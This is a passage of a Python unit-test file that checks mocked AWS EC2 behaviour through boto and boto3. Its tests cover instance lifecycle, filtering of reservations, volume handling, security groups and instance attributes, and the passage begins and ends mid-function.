"An error occurred (DryRunOperation) when calling the RunInstance operation: Request would have succeeded, but DryRun flag is set"
)
reservation = conn.run_instances(EXAMPLE_AMI_ID)
reservation.should.be.a(Reservation)
reservation.instances.should.have.length_of(1)
instance = reservation.instances[0]
instance.state.should.equal("pending")
reservations = conn.get_all_reservations()
reservations.should.have.length_of(1)
reservations[0].id.should.equal(reservation.id)
instances = reservations[0].instances
instances.should.have.length_of(1)
instance = instances[0]
instance.id.should.equal(instance.id)
instance.state.should.equal("running")
instance.launch_time.should.equal("2014-01-01T05:00:00.000Z")
instance.vpc_id.shouldnt.equal(None)
instance.placement.should.equal("us-east-1a")
root_device_name = instance.root_device_name
instance.block_device_mapping[root_device_name].status.should.equal("in-use")
volume_id = instance.block_device_mapping[root_device_name].volume_id
volume_id.should.match(r"vol-\w+")
volume = conn.get_all_volumes(volume_ids=[volume_id])[0]
volume.attach_data.instance_id.should.equal(instance.id)
volume.status.should.equal("in-use")
with pytest.raises(EC2ResponseError) as ex:
conn.terminate_instances([instance.id], dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the TerminateInstance operation: Request would have succeeded, but DryRun flag is set"
)
conn.terminate_instances([instance.id])
reservations = conn.get_all_reservations()
instance = reservations[0].instances[0]
instance.state.should.equal("terminated")
@mock_ec2
def test_instance_terminate_discard_volumes():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{
"DeviceName": "/dev/sda1",
"Ebs": {"VolumeSize": 50, "DeleteOnTermination": True},
}
],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert not list(ec2_resource.volumes.all())
@mock_ec2
def test_instance_terminate_keep_volumes_explicit():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{
"DeviceName": "/dev/sda1",
"Ebs": {"VolumeSize": 50, "DeleteOnTermination": False},
}
],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert len(list(ec2_resource.volumes.all())) == 1
@mock_ec2
def test_instance_terminate_keep_volumes_implicit():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[{"DeviceName": "/dev/sda1", "Ebs": {"VolumeSize": 50}}],
)
instance = result[0]
instance_volume_ids = []
for volume in instance.volumes.all():
instance_volume_ids.append(volume.volume_id)
instance.terminate()
instance.wait_until_terminated()
assert len(instance_volume_ids) == 1
volume = ec2_resource.Volume(instance_volume_ids[0])
volume.state.should.equal("available")
@mock_ec2
def test_instance_terminate_detach_volumes():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[
{"DeviceName": "/dev/sda1", "Ebs": {"VolumeSize": 50}},
{"DeviceName": "/dev/sda2", "Ebs": {"VolumeSize": 50}},
],
)
instance = result[0]
for volume in instance.volumes.all():
response = instance.detach_volume(VolumeId=volume.volume_id)
response["State"].should.equal("detaching")
instance.terminate()
instance.wait_until_terminated()
assert len(list(ec2_resource.volumes.all())) == 2
@mock_ec2
def test_instance_detach_volume_wrong_path():
ec2_resource = boto3.resource("ec2", "us-west-1")
result = ec2_resource.create_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
BlockDeviceMappings=[{"DeviceName": "/dev/sda1", "Ebs": {"VolumeSize": 50}},],
)
instance = result[0]
for volume in instance.volumes.all():
with pytest.raises(ClientError) as ex:
instance.detach_volume(VolumeId=volume.volume_id, Device="/dev/sdf")
ex.value.response["Error"]["Code"].should.equal("InvalidAttachment.NotFound")
ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400)
ex.value.response["Error"]["Message"].should.equal(
"The volume {0} is not attached to instance {1} as device {2}".format(
volume.volume_id, instance.instance_id, "/dev/sdf"
)
)
@mock_ec2_deprecated
def test_terminate_empty_instances():
conn = boto.connect_ec2("the_key", "the_secret")
conn.terminate_instances.when.called_with([]).should.throw(EC2ResponseError)
@freeze_time("2014-01-01 05:00:00")
@mock_ec2_deprecated
def test_instance_attach_volume():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
vol1 = conn.create_volume(size=36, zone=conn.region.name)
vol1.attach(instance.id, "/dev/sda1")
vol1.update()
vol2 = conn.create_volume(size=65, zone=conn.region.name)
vol2.attach(instance.id, "/dev/sdb1")
vol2.update()
vol3 = conn.create_volume(size=130, zone=conn.region.name)
vol3.attach(instance.id, "/dev/sdc1")
vol3.update()
reservations = conn.get_all_reservations()
instance = reservations[0].instances[0]
instance.block_device_mapping.should.have.length_of(3)
for v in conn.get_all_volumes(
volume_ids=[instance.block_device_mapping["/dev/sdc1"].volume_id]
):
v.attach_data.instance_id.should.equal(instance.id)
# can do due to freeze_time decorator.
v.attach_data.attach_time.should.equal(instance.launch_time)
# can do due to freeze_time decorator.
v.create_time.should.equal(instance.launch_time)
v.region.name.should.equal(instance.region.name)
v.status.should.equal("in-use")
@mock_ec2_deprecated
def test_get_instances_by_id():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instance1, instance2 = reservation.instances
reservations = conn.get_all_reservations(instance_ids=[instance1.id])
reservations.should.have.length_of(1)
reservation = reservations[0]
reservation.instances.should.have.length_of(1)
reservation.instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(instance_ids=[instance1.id, instance2.id])
reservations.should.have.length_of(1)
reservation = reservations[0]
reservation.instances.should.have.length_of(2)
instance_ids = [instance.id for instance in reservation.instances]
instance_ids.should.equal([instance1.id, instance2.id])
# Call get_all_reservations with a bad id should raise an error
with pytest.raises(EC2ResponseError) as cm:
conn.get_all_reservations(instance_ids=[instance1.id, "i-1234abcd"])
cm.value.code.should.equal("InvalidInstanceID.NotFound")
cm.value.status.should.equal(400)
cm.value.request_id.should_not.be.none
@mock_ec2
def test_get_paginated_instances():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
for i in range(100):
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
resp = client.describe_instances(MaxResults=50)
reservations = resp["Reservations"]
reservations.should.have.length_of(50)
next_token = resp["NextToken"]
next_token.should_not.be.none
resp2 = client.describe_instances(NextToken=next_token)
reservations.extend(resp2["Reservations"])
reservations.should.have.length_of(100)
assert "NextToken" not in resp2.keys()
@mock_ec2
def test_create_with_tags():
ec2 = boto3.client("ec2", region_name="us-west-2")
instances = ec2.run_instances(
ImageId=EXAMPLE_AMI_ID,
MinCount=1,
MaxCount=1,
InstanceType="t2.micro",
TagSpecifications=[
{
"ResourceType": "instance",
"Tags": [
{"Key": "MY_TAG1", "Value": "MY_VALUE1"},
{"Key": "MY_TAG2", "Value": "MY_VALUE2"},
],
},
{
"ResourceType": "instance",
"Tags": [{"Key": "MY_TAG3", "Value": "MY_VALUE3"}],
},
],
)
assert "Tags" in instances["Instances"][0]
len(instances["Instances"][0]["Tags"]).should.equal(3)
@mock_ec2_deprecated
def test_get_instances_filtering_by_state():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
conn.terminate_instances([instance1.id])
reservations = conn.get_all_reservations(filters={"instance-state-name": "running"})
reservations.should.have.length_of(1)
# Since we terminated instance1, only instance2 and instance3 should be
# returned
instance_ids = [instance.id for instance in reservations[0].instances]
set(instance_ids).should.equal(set([instance2.id, instance3.id]))
reservations = conn.get_all_reservations(
[instance2.id], filters={"instance-state-name": "running"}
)
reservations.should.have.length_of(1)
instance_ids = [instance.id for instance in reservations[0].instances]
instance_ids.should.equal([instance2.id])
reservations = conn.get_all_reservations(
[instance2.id], filters={"instance-state-name": "terminated"}
)
list(reservations).should.equal([])
# get_all_reservations should still return all 3
reservations = conn.get_all_reservations()
reservations[0].instances.should.have.length_of(3)
conn.get_all_reservations.when.called_with(
filters={"not-implemented-filter": "foobar"}
).should.throw(NotImplementedError)
@mock_ec2_deprecated
def test_get_instances_filtering_by_instance_id():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
reservations = conn.get_all_reservations(filters={"instance-id": instance1.id})
# get_all_reservations should return just instance1
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(
filters={"instance-id": [instance1.id, instance2.id]}
)
# get_all_reservations should return two
reservations[0].instances.should.have.length_of(2)
reservations = conn.get_all_reservations(filters={"instance-id": "non-existing-id"})
reservations.should.have.length_of(0)
@mock_ec2_deprecated
def test_get_instances_filtering_by_instance_type():
conn = boto.connect_ec2()
reservation1 = conn.run_instances(EXAMPLE_AMI_ID, instance_type="m1.small")
instance1 = reservation1.instances[0]
reservation2 = conn.run_instances(EXAMPLE_AMI_ID, instance_type="m1.small")
instance2 = reservation2.instances[0]
reservation3 = conn.run_instances(EXAMPLE_AMI_ID, instance_type="t1.micro")
instance3 = reservation3.instances[0]
reservations = conn.get_all_reservations(filters={"instance-type": "m1.small"})
# get_all_reservations should return instance1,2
reservations.should.have.length_of(2)
reservations[0].instances.should.have.length_of(1)
reservations[1].instances.should.have.length_of(1)
instance_ids = [reservations[0].instances[0].id, reservations[1].instances[0].id]
set(instance_ids).should.equal(set([instance1.id, instance2.id]))
reservations = conn.get_all_reservations(filters={"instance-type": "t1.micro"})
# get_all_reservations should return one
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance3.id)
reservations = conn.get_all_reservations(
filters={"instance-type": ["t1.micro", "m1.small"]}
)
reservations.should.have.length_of(3)
reservations[0].instances.should.have.length_of(1)
reservations[1].instances.should.have.length_of(1)
reservations[2].instances.should.have.length_of(1)
instance_ids = [
reservations[0].instances[0].id,
reservations[1].instances[0].id,
reservations[2].instances[0].id,
]
set(instance_ids).should.equal(set([instance1.id, instance2.id, instance3.id]))
reservations = conn.get_all_reservations(filters={"instance-type": "bogus"})
# bogus instance-type should return none
reservations.should.have.length_of(0)
@mock_ec2_deprecated
def test_get_instances_filtering_by_reason_code():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.stop()
instance2.terminate()
reservations = conn.get_all_reservations(
filters={"state-reason-code": "Client.UserInitiatedShutdown"}
)
# get_all_reservations should return instance1 and instance2
reservations[0].instances.should.have.length_of(2)
set([instance1.id, instance2.id]).should.equal(
set([i.id for i in reservations[0].instances])
)
reservations = conn.get_all_reservations(filters={"state-reason-code": ""})
# get_all_reservations should return instance 3
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_source_dest_check():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instance1, instance2 = reservation.instances
conn.modify_instance_attribute(
instance1.id, attribute="sourceDestCheck", value=False
)
source_dest_check_false = conn.get_all_reservations(
filters={"source-dest-check": "false"}
)
source_dest_check_true = conn.get_all_reservations(
filters={"source-dest-check": "true"}
)
source_dest_check_false[0].instances.should.have.length_of(1)
source_dest_check_false[0].instances[0].id.should.equal(instance1.id)
source_dest_check_true[0].instances.should.have.length_of(1)
source_dest_check_true[0].instances[0].id.should.equal(instance2.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_vpc_id():
conn = boto.connect_vpc("the_key", "the_secret")
vpc1 = conn.create_vpc("10.0.0.0/16")
subnet1 = conn.create_subnet(vpc1.id, "10.0.0.0/27")
reservation1 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet1.id)
instance1 = reservation1.instances[0]
vpc2 = conn.create_vpc("10.1.0.0/16")
subnet2 = conn.create_subnet(vpc2.id, "10.1.0.0/27")
reservation2 = conn.run_instances(EXAMPLE_AMI_ID, min_count=1, subnet_id=subnet2.id)
instance2 = reservation2.instances[0]
reservations1 = conn.get_all_reservations(filters={"vpc-id": vpc1.id})
reservations1.should.have.length_of(1)
reservations1[0].instances.should.have.length_of(1)
reservations1[0].instances[0].id.should.equal(instance1.id)
reservations1[0].instances[0].vpc_id.should.equal(vpc1.id)
reservations1[0].instances[0].subnet_id.should.equal(subnet1.id)
reservations2 = conn.get_all_reservations(filters={"vpc-id": vpc2.id})
reservations2.should.have.length_of(1)
reservations2[0].instances.should.have.length_of(1)
reservations2[0].instances[0].id.should.equal(instance2.id)
reservations2[0].instances[0].vpc_id.should.equal(vpc2.id)
reservations2[0].instances[0].subnet_id.should.equal(subnet2.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_architecture():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=1)
instance = reservation.instances
reservations = conn.get_all_reservations(filters={"architecture": "x86_64"})
# get_all_reservations should return the instance
reservations[0].instances.should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_image_id():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
reservations = client.describe_instances(
Filters=[{"Name": "image-id", "Values": [EXAMPLE_AMI_ID]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_account_id():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
conn.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)
reservations = client.describe_instances(
Filters=[{"Name": "owner-id", "Values": ["123456789012"]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_private_dns():
client = boto3.client("ec2", region_name="us-east-1")
conn = boto3.resource("ec2", "us-east-1")
conn.create_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress="127.0.0.1"
)
reservations = client.describe_instances(
Filters=[{"Name": "private-dns-name", "Values": ["ip-10-0-0-1.ec2.internal"]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_ni_private_dns():
client = boto3.client("ec2", region_name="us-west-2")
conn = boto3.resource("ec2", "us-west-2")
conn.create_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, PrivateIpAddress="127.0.0.1"
)
reservations = client.describe_instances(
Filters=[
{
"Name": "network-interface.private-dns-name",
"Values": ["ip-10-0-0-1.us-west-2.compute.internal"],
}
]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_instance_group_name():
client = boto3.client("ec2", region_name="us-east-1")
client.create_security_group(Description="test", GroupName="test_sg")
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=["test_sg"]
)
reservations = client.describe_instances(
Filters=[{"Name": "instance.group-name", "Values": ["test_sg"]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_instance_group_id():
client = boto3.client("ec2", region_name="us-east-1")
create_sg = client.create_security_group(Description="test", GroupName="test_sg")
group_id = create_sg["GroupId"]
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1, SecurityGroups=["test_sg"]
)
reservations = client.describe_instances(
Filters=[{"Name": "instance.group-id", "Values": [group_id]}]
)["Reservations"]
reservations[0]["Instances"].should.have.length_of(1)
@mock_ec2
def test_get_instances_filtering_by_subnet_id():
client = boto3.client("ec2", region_name="us-east-1")
vpc_cidr = ipaddress.ip_network("192.168.42.0/24")
subnet_cidr = ipaddress.ip_network("192.168.42.0/25")
resp = client.create_vpc(CidrBlock=str(vpc_cidr),)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id,
)
reservations = client.describe_instances(
Filters=[{"Name": "subnet-id", "Values": [subnet_id]}]
)["Reservations"]
reservations.should.have.length_of(1)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag("tag1", "value1")
instance1.add_tag("tag2", "value2")
instance2.add_tag("tag1", "value1")
instance2.add_tag("tag2", "wrong value")
instance3.add_tag("tag2", "value2")
reservations = conn.get_all_reservations(filters={"tag:tag0": "value0"})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={"tag:tag1": "value1"})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(
filters={"tag:tag1": "value1", "tag:tag2": "value2"}
)
# get_all_reservations should return the instance with both tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(
filters={"tag:tag1": "value1", "tag:tag2": "value2"}
)
# get_all_reservations should return the instance with both tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(1)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations = conn.get_all_reservations(filters={"tag:tag2": ["value2", "bogus"]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag_value():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag("tag1", "value1")
instance1.add_tag("tag2", "value2")
instance2.add_tag("tag1", "value1")
instance2.add_tag("tag2", "wrong value")
instance3.add_tag("tag2", "value2")
reservations = conn.get_all_reservations(filters={"tag-value": "value0"})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={"tag-value": "value1"})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(
filters={"tag-value": ["value2", "value1"]}
)
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(3)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations[0].instances[2].id.should.equal(instance3.id)
reservations = conn.get_all_reservations(filters={"tag-value": ["value2", "bogus"]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_get_instances_filtering_by_tag_name():
conn = boto.connect_ec2()
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)
instance1, instance2, instance3 = reservation.instances
instance1.add_tag("tag1")
instance1.add_tag("tag2")
instance2.add_tag("tag1")
instance2.add_tag("tag2X")
instance3.add_tag("tag3")
reservations = conn.get_all_reservations(filters={"tag-key": "tagX"})
# get_all_reservations should return no instances
reservations.should.have.length_of(0)
reservations = conn.get_all_reservations(filters={"tag-key": "tag1"})
# get_all_reservations should return both instances with this tag value
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(2)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations = conn.get_all_reservations(filters={"tag-key": ["tag1", "tag3"]})
# get_all_reservations should return both instances with one of the
# acceptable tag values
reservations.should.have.length_of(1)
reservations[0].instances.should.have.length_of(3)
reservations[0].instances[0].id.should.equal(instance1.id)
reservations[0].instances[1].id.should.equal(instance2.id)
reservations[0].instances[2].id.should.equal(instance3.id)
@mock_ec2_deprecated
def test_instance_start_and_stop():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=2)
instances = reservation.instances
instances.should.have.length_of(2)
instance_ids = [instance.id for instance in instances]
with pytest.raises(EC2ResponseError) as ex:
stopped_instances = conn.stop_instances(instance_ids, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the StopInstance operation: Request would have succeeded, but DryRun flag is set"
)
stopped_instances = conn.stop_instances(instance_ids)
for instance in stopped_instances:
instance.state.should.equal("stopping")
with pytest.raises(EC2ResponseError) as ex:
started_instances = conn.start_instances([instances[0].id], dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the StartInstance operation: Request would have succeeded, but DryRun flag is set"
)
started_instances = conn.start_instances([instances[0].id])
started_instances[0].state.should.equal("pending")
@mock_ec2_deprecated
def test_instance_reboot():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.reboot(dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the RebootInstance operation: Request would have succeeded, but DryRun flag is set"
)
instance.reboot()
instance.state.should.equal("pending")
@mock_ec2_deprecated
def test_instance_attribute_instance_type():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("instanceType", "m1.small", dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyInstanceType operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("instanceType", "m1.small")
instance_attribute = instance.get_attribute("instanceType")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("instanceType").should.equal("m1.small")
@mock_ec2_deprecated
def test_modify_instance_attribute_security_groups():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
sg_id = conn.create_security_group(
"test security group", "this is a test security group"
).id
sg_id2 = conn.create_security_group(
"test security group 2", "this is a test security group 2"
).id
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("groupSet", [sg_id, sg_id2], dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("groupSet", [sg_id, sg_id2])
instance_attribute = instance.get_attribute("groupSet")
instance_attribute.should.be.a(InstanceAttribute)
group_list = instance_attribute.get("groupSet")
any(g.id == sg_id for g in group_list).should.be.ok
any(g.id == sg_id2 for g in group_list).should.be.ok
@mock_ec2_deprecated
def test_instance_attribute_user_data():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("userData", "this is my user data", dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifyUserData operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("userData", "this is my user data")
instance_attribute = instance.get_attribute("userData")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("userData").should.equal("this is my user data")
@mock_ec2_deprecated
def test_instance_attribute_source_dest_check():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
# Default value is true
instance.sourceDestCheck.should.equal("true")
instance_attribute = instance.get_attribute("sourceDestCheck")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("sourceDestCheck").should.equal(True)
# Set to false (note: Boto converts bool to string, eg 'false')
with pytest.raises(EC2ResponseError) as ex:
instance.modify_attribute("sourceDestCheck", False, dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the ModifySourceDestCheck operation: Request would have succeeded, but DryRun flag is set"
)
instance.modify_attribute("sourceDestCheck", False)
instance.update()
instance.sourceDestCheck.should.equal("false")
instance_attribute = instance.get_attribute("sourceDestCheck")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("sourceDestCheck").should.equal(False)
# Set back to true
instance.modify_attribute("sourceDestCheck", True)
instance.update()
instance.sourceDestCheck.should.equal("true")
instance_attribute = instance.get_attribute("sourceDestCheck")
instance_attribute.should.be.a(InstanceAttribute)
instance_attribute.get("sourceDestCheck").should.equal(True)
@mock_ec2_deprecated
def test_user_data_with_run_instance():
user_data = b"some user data"
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, user_data=user_data)
instance = reservation.instances[0]
instance_attribute = instance.get_attribute("userData")
instance_attribute.should.be.a(InstanceAttribute)
retrieved_user_data = instance_attribute.get("userData").encode("utf-8")
decoded_user_data = decode_method(retrieved_user_data)
decoded_user_data.should.equal(b"some user data")
@mock_ec2_deprecated
def test_run_instance_with_security_group_name():
conn = boto.connect_ec2("the_key", "the_secret")
with pytest.raises(EC2ResponseError) as ex:
group = conn.create_security_group("group1", "some description", dry_run=True)
ex.value.error_code.should.equal("DryRunOperation")
ex.value.status.should.equal(400)
ex.value.message.should.equal(
"An error occurred (DryRunOperation) when calling the CreateSecurityGroup operation: Request would have succeeded, but DryRun flag is set"
)
group = conn.create_security_group("group1", "some description")
reservation = conn.run_instances(EXAMPLE_AMI_ID, security_groups=["group1"])
instance = reservation.instances[0]
instance.groups[0].id.should.equal(group.id)
instance.groups[0].name.should.equal("group1")
@mock_ec2_deprecated
def test_run_instance_with_security_group_id():
conn = boto.connect_ec2("the_key", "the_secret")
group = conn.create_security_group("group1", "some description")
reservation = conn.run_instances(EXAMPLE_AMI_ID, security_group_ids=[group.id])
instance = reservation.instances[0]
instance.groups[0].id.should.equal(group.id)
instance.groups[0].name.should.equal("group1")
@mock_ec2_deprecated
def test_run_instance_with_instance_type():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, instance_type="t1.micro")
instance = reservation.instances[0]
instance.instance_type.should.equal("t1.micro")
@mock_ec2_deprecated
def test_run_instance_with_default_placement():
conn = boto.ec2.connect_to_region("us-east-1")
reservation = conn.run_instances(EXAMPLE_AMI_ID)
instance = reservation.instances[0]
instance.placement.should.equal("us-east-1a")
@mock_ec2_deprecated
def test_run_instance_with_placement():
conn = boto.connect_ec2("the_key", "the_secret")
reservation = conn.run_instances(EXAMPLE_AMI_ID, placement="us-east-1b")
instance = reservation.instances[0]
instance.placement.should.equal("us-east-1b")
@mock_ec2
def test_run_instance_with_subnet_boto3():
client = boto3.client("ec2", region_name="eu-central-1")
ip_networks = [
(ipaddress.ip_network("10.0.0.0/16"), ipaddress.ip_network("10.0.99.0/24")),
(
ipaddress.ip_network("192.168.42.0/24"),
ipaddress.ip_network("192.168.42.0/25"),
),
]
# Tests instances are created with the correct IPs
for vpc_cidr, subnet_cidr in ip_networks:
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy="default",
)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
resp = client.run_instances(
ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id
)
instance = resp["Instances"][0]
instance["SubnetId"].should.equal(subnet_id)
priv_ipv4 = ipaddress.ip_address(six.text_type(instance["PrivateIpAddress"]))
subnet_cidr.should.contain(priv_ipv4)
@mock_ec2
def test_run_instance_with_specified_private_ipv4():
client = boto3.client("ec2", region_name="eu-central-1")
vpc_cidr = ipaddress.ip_network("192.168.42.0/24")
subnet_cidr = ipaddress.ip_network("192.168.42.0/25")
resp = client.create_vpc(
CidrBlock=str(vpc_cidr),
AmazonProvidedIpv6CidrBlock=False,
DryRun=False,
InstanceTenancy="default",
)
vpc_id = resp["Vpc"]["VpcId"]
resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)
subnet_id = resp["Subnet"]["SubnetId"]
resp = client.run_instances(
